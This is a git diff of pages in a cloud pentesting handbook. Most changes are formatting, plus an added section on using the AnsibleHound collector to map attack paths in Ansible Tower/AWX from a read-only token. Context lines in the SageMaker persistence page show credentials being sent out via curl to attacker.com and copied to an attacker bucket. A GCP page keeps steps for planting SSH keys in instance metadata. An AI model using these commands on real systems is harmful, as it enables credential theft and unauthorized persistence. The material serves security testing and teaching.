diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index 5d6d5b7405..89ab818d4c 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -227,6 +227,7 @@
     - [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
     - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
     - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
+    - [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md)
     - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
     - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
     - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
index 779443f101..36e6f6b539 100644
--- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
+++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -136,6 +136,75 @@ From a **white box security** review, you would need the **System Auditor role**
 
 </details>
 
+## Enumeration & Attack-Path Mapping with AnsibleHound
+
+`AnsibleHound` is an open-source BloodHound *OpenGraph* collector written in Go that turns a **read-only** Ansible Tower/AWX/Automation Controller API token into a complete permission graph ready to be analysed inside BloodHound (or BloodHound Enterprise).
+
+### Why is this useful?
+1. The Tower/AWX REST API is extremely rich and exposes **every object and RBAC relationship** your instance knows about.
+2. Even with the lowest privilege (**Read**) token it is possible to recursively enumerate all accessible resources (organisations, inventories, hosts, credentials, projects, job templates, users, teams…).
+3. When the raw data is converted to the BloodHound schema you obtain the same *attack-path* visualisation capabilities that are so popular in Active Directory assessments – but now directed at your CI/CD estate.
+
+Security teams (and attackers!) can therefore:
+* Quickly understand **who can become admin of what**.
+* Identify **credentials or hosts that are reachable** from an unprivileged account.
+* Chain multiple “Read ➜ Use ➜ Execute ➜ Admin” edges to obtain full control over the Tower instance or the underlying infrastructure.
+
+### Prerequisites
+* Ansible Tower / AWX / Automation Controller reachable over HTTPS.
+* A user API token scoped to **Read** only (created from *User Details → Tokens → Create Token → scope = Read*).
+* Go ≥ 1.20 to compile the collector (or use the pre-built binaries).
+
+### Building & Running
+```bash
+# Compile the collector
+cd collector
+go build . -o build/ansiblehound
+
+# Execute against the target instance
+./build/ansiblehound -u "https://tower.example.com/" -t "READ_ONLY_TOKEN"
+```
+Internally AnsibleHound performs *paginated* `GET` requests against (at least) the following endpoints and automatically follows the `related` links returned in every JSON object:
+```
+/api/v2/organizations/
+/api/v2/inventories/
+/api/v2/hosts/
+/api/v2/job_templates/
+/api/v2/projects/
+/api/v2/credentials/
+/api/v2/users/
+/api/v2/teams/
+```
+All collected pages are merged into a single JSON file on disk (default: `ansiblehound-output.json`).
+
+### BloodHound Transformation
+The raw Tower data is then **transformed to BloodHound OpenGraph** using custom nodes prefixed with `AT` (Ansible Tower):
+* `ATOrganization`, `ATInventory`, `ATHost`, `ATJobTemplate`, `ATProject`, `ATCredential`, `ATUser`, `ATTeam`
+
+And edges modelling relationships / privileges:
+* `ATContains`, `ATUses`, `ATExecute`, `ATRead`, `ATAdmin`
+
+The result can be imported straight into BloodHound:
+```bash
+neo4j stop   # if BloodHound CE is running locally
+bloodhound-import ansiblehound-output.json
+```
+
+Optionally you can upload **custom icons** so that the new node types are visually distinct:
+```bash
+python3 scripts/import-icons.py "https://bloodhound.example.com" "BH_JWT_TOKEN"
+```
+
+### Defensive & Offensive Considerations
+* A *Read* token is normally considered harmless but still leaks the **full topology and every credential metadata**. Treat it as sensitive!
+* Enforce **least privilege** and rotate / revoke unused tokens.
+* Monitor the API for excessive enumeration (multiple sequential `GET` requests, high pagination activity).
+* From an attacker perspective this is a perfect *initial foothold → privilege escalation* technique inside the CI/CD pipeline.
+
+## References
+* [AnsibleHound – BloodHound Collector for Ansible Tower/AWX](https://github.com/TheSleekBoyCompany/AnsibleHound)
+* [BloodHound OSS](https://github.com/BloodHoundAD/BloodHound)
+
 {{#include ../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
index ff5e35767c..fc9888a4f4 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -1,8 +1,10 @@
 # Concourse Architecture
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Concourse Architecture
 
-{{#include ../../banners/hacktricks-training.md}}
+
 
 [**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
 
@@ -38,4 +40,3 @@ In order to execute tasks concourse must have some workers. These workers **regi
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
index cb128742af..42d6f75d42 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -1,8 +1,10 @@
 # Concourse Enumeration & Attacks
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Concourse Enumeration & Attacks
 
-{{#include ../../banners/hacktricks-training.md}}
+
 
 ### User Roles & Permissions
 
@@ -437,9 +439,8 @@ Accept-Encoding: gzip.
 
 ## References
 
-- https://concourse-ci.org/vars.html
+- [https://concourse-ci.org/vars.html](https://concourse-ci.org/vars.html)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
index 15c1642336..6950cdd17d 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1,5 +1,5 @@
 # Gh Actions - Artifact Poisoning
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
index 068050d0f0..52f5ffccb6 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -1,5 +1,5 @@
 # GH Actions - Cache Poisoning
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
index d03be6f817..d9d11a81b4 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -1,5 +1,5 @@
 # Gh Actions - Context Script Injections
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md
index c1a87add8c..4b29e89191 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -1,5 +1,5 @@
 # AWS - Persistence
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
index 4a002be55b..5a50b52035 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
@@ -1,5 +1,6 @@
+# Aws Sagemaker Persistence
 
-# AWS - SageMaker Lifecycle Configuration Persistence
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Overview of Persistence Techniques
 
@@ -157,3 +158,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
 
 curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
 ```
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
index b83383b2ab..dd76b0935b 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -1,5 +1,5 @@
 # AWS - Post Exploitation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md
index b47f35d239..7c8f80a7c6 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md
@@ -35,3 +35,4 @@ However, a **bypass** has been identified where an attacker with sufficient perm
 **Summary:**
 
 This vulnerability allows an attacker with sufficient AWS IAM permissions to recover previously detected secrets even after the original file has been deleted from S3. If an AWS secret key, access token, or other sensitive credential is exposed, an attacker could leverage this flaw to retrieve it and gain unauthorized access to AWS resources. This could lead to privilege escalation, unauthorized data access, or further compromise of cloud assets, resulting in data breaches and service disruptions.
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
index 29bbc001de..d2d52480e5 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -1,8 +1,10 @@
 # AWS - Sagemaker Privesc
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 ## AWS - Sagemaker Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
+
 
 ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
 
@@ -114,4 +116,3 @@ _I haven't exploited because of the lack of time, but looks similar to the previ
 {{#include ../../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
index 4b1e5e7e91..129cac0492 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
@@ -1,5 +1,7 @@
 # AWS - WorkDocs Privesc
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 ## WorkDocs
 
 For more info about WorkDocs check:
@@ -54,3 +56,4 @@ I didn't find any way to do this from the cli.
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
index 9025829b41..f928c389db 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
@@ -1,12 +1,10 @@
 # AWS - ECR Enum
 
-## AWS - ECR Enum
-
 {{#include ../../../banners/hacktricks-training.md}}
 
-### ECR
+## ECR
 
-#### Basic Information
+### Basic Information
 
 Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
 
@@ -47,7 +45,7 @@ These are the **images** that in the **private registry** or to the **public** o
 
 <figure><img src="../../../images/image (280).png" alt=""><figcaption></figcaption></figure>
 
-#### Enumeration
+### Enumeration
 
 ```bash
 # Get repos
@@ -69,13 +67,13 @@ aws ecr get-registry-policy
 aws ecr get-repository-policy --repository-name <repo_name>
 ```
 
-#### Unauthenticated Enum
+### Unauthenticated Enum
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
 {{#endref}}
 
-#### Privesc
+### Privesc
 
 In the following page you can check how to **abuse ECR permissions to escalate privileges**:
 
@@ -83,13 +81,13 @@ In the following page you can check how to **abuse ECR permissions to escalate p
 ../aws-privilege-escalation/aws-ecr-privesc.md
 {{#endref}}
 
-#### Post Exploitation
+### Post Exploitation
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecr-post-exploitation.md
 {{#endref}}
 
-#### Persistence
+### Persistence
 
 {{#ref}}
 ../aws-persistence/aws-ecr-persistence.md
@@ -103,4 +101,3 @@ In the following page you can check how to **abuse ECR permissions to escalate p
 
 
 
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
index 4ef6b9d8d4..fd99d6acf9 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
@@ -1,5 +1,5 @@
 # AWS - Security & Detection Services
 
-
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
index 655b81fa7b..8922cbe884 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
@@ -1,10 +1,9 @@
 # AWS - Inspector Enum
 
-## AWS - Inspector Enum
-
 {{#include ../../../../banners/hacktricks-training.md}}
 
-### Inspector
+
+## Inspector
 
 Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management.
 
@@ -387,4 +386,3 @@ aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
 
 
 
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
index a975d74763..4fc3c02335 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
@@ -1,7 +1,5 @@
 # AWS - Trusted Advisor Enum
 
-## AWS - Trusted Advisor Enum
-
 {{#include ../../../../banners/hacktricks-training.md}}
 
 ## AWS Trusted Advisor Overview
@@ -72,4 +70,3 @@ AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, perform
 
 
 
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
index 661b836d50..81ddcb0962 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
@@ -1,7 +1,5 @@
 # AWS - WAF Enum
 
-## AWS - WAF Enum
-
 {{#include ../../../../banners/hacktricks-training.md}}
 
 ## AWS WAF
@@ -472,4 +470,3 @@ aws wafv2 untag-resource --resource-arn <value> --tag-keys <value>
 
 
 
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
index 3bde2e2545..c7246bd6f0 100644
--- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
@@ -1,7 +1,5 @@
 # AWS - EventBridge Scheduler Enum
 
-## EventBridge Scheduler
-
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## EventBridge Scheduler
@@ -82,4 +80,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis
 
 
 
-
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md
index 43798c4bf6..234962b1c8 100644
--- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md
@@ -1,5 +1,5 @@
 # Az - Post Exploitation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
index 2c254db403..fca69ffdf8 100644
--- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
@@ -19,3 +19,4 @@ For more information about function apps check:
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
index 6e0dca1993..0e9f547cad 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
@@ -1,5 +1,5 @@
 # Az - Privilege Escalation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
index 352c662b55..70d5a61f1d 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
@@ -1,5 +1,4 @@
-
-# Az - Static Web Apps
+# Az Static Web Apps
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -202,4 +201,3 @@ All the information about privilege escalation and post exploitation in Azure St
 - [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
index 4aa176582f..908270b0b5 100644
--- a/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
@@ -1,5 +1,7 @@
 # GCP - Permissions for a Pentest
 
+{{#include ../../banners/hacktricks-training.md}}
+
 If you want to pentest a GCP environment you need to ask for enough permissions to **check all or most of the services** used in **GCP**. Ideally, you should ask the client to create:
 
 * **Create** a new **project**
@@ -144,3 +146,4 @@ roles/bigquery.metadataViewer
 ```
 
 
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/README.md b/src/pentesting-cloud/gcp-security/gcp-persistence/README.md
index e6fa4ba64c..3327690acd 100644
--- a/src/pentesting-cloud/gcp-security/gcp-persistence/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/README.md
@@ -1,5 +1,5 @@
 # GCP - Persistence
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
index 381b119b8d..e241336969 100644
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
@@ -1,5 +1,5 @@
 # GCP - Post Exploitation
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
index ce93c049ca..9d39a5623a 100644
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
@@ -128,3 +128,4 @@ def injection():
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
index 381870b671..a68e756b51 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
@@ -1,20 +1,18 @@
 # GCP - Add Custom SSH Metadata
 
-## GCP - Add Custom SSH Metadata
-
 {{#include ../../../../banners/hacktricks-training.md}}
 
-### Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
+## Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
 
 Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**.
 
-#### **Incorporation of SSH Keys into Custom Metadata**
+### **Incorporation of SSH Keys into Custom Metadata**
 
 On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**.
 
 Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host.
 
-#### **Add SSH key to existing privileged user**
+### **Add SSH key to existing privileged user**
 
 1. **Examine Existing SSH Keys on the Instance:**
 
@@ -55,7 +53,7 @@ Therefore, if an attacker can modify custom metadata, he could make the the daem
      sudo id
      ```
 
-#### **Create a new privileged user and add a SSH key**
+### **Create a new privileged user and add a SSH key**
 
 If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges:
 
@@ -77,7 +75,7 @@ gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-k
 ssh -i ./key "$NEWUSER"@localhost
 ```
 
-#### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
+### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
 
 It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide:
 
@@ -100,4 +98,3 @@ It's possible to broaden the reach of SSH access to multiple Virtual Machines (V
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
index 55585de79c..e29933d2f6 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
@@ -58,3 +58,4 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/README.md b/src/pentesting-cloud/gcp-security/gcp-services/README.md
index d384117e2c..c1f2ab867d 100644
--- a/src/pentesting-cloud/gcp-security/gcp-services/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/README.md
@@ -1,5 +1,5 @@
 # GCP - Services
 
-
+{{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/README.md b/src/pentesting-cloud/ibm-cloud-pentesting/README.md
index 38f5c3c687..eae85da463 100644
--- a/src/pentesting-cloud/ibm-cloud-pentesting/README.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/README.md
@@ -1,10 +1,8 @@
 # IBM Cloud Pentesting
 
-## IBM Cloud Pentesting
-
 {{#include ../../banners/hacktricks-training.md}}
 
-### What is IBM cloud? (By chatGPT)
+## What is IBM cloud? (By chatGPT)
 
 IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud.
 
@@ -15,7 +13,7 @@ When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distin
 3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform.
 4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud.
 
-#### Basic Information
+### Basic Information
 
 For some basic information about IAM and hierarchi check:
 
@@ -23,7 +21,7 @@ For some basic information about IAM and hierarchi check:
 ibm-basic-information.md
 {{#endref}}
 
-### SSRF
+## SSRF
 
 Learn how you can access the medata endpoint of IBM in the following page:
 
@@ -38,4 +36,3 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
index 28852b59f4..ee6ec55bba 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
@@ -1,7 +1,5 @@
 # Kubernetes Basics
 
-## Kubernetes Basics
-
 {{#include ../../banners/hacktricks-training.md}}
 
 **The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**
@@ -569,4 +567,3 @@ https://www.youtube.com/watch?v=X48VuDVv0do
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
index 7b8b8a4387..9fdc0840f8 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
@@ -1,5 +1,7 @@
 # External Secret Operator
 
+{{#include ../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
 
 This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets.
@@ -119,3 +121,4 @@ https://github.com/external-secrets/external-secrets
 
 
 
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
index 500e10f43a..75b5d5468b 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
@@ -1,5 +1,7 @@
 # Kubernetes Kyverno
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Definition
@@ -57,3 +59,4 @@ When a pod is created in the `default` namespace without the label `app: myapp`,
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
index fbc46f318e..a53bb473a5 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
@@ -1,5 +1,7 @@
 # Kubernetes Kyverno bypass
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 
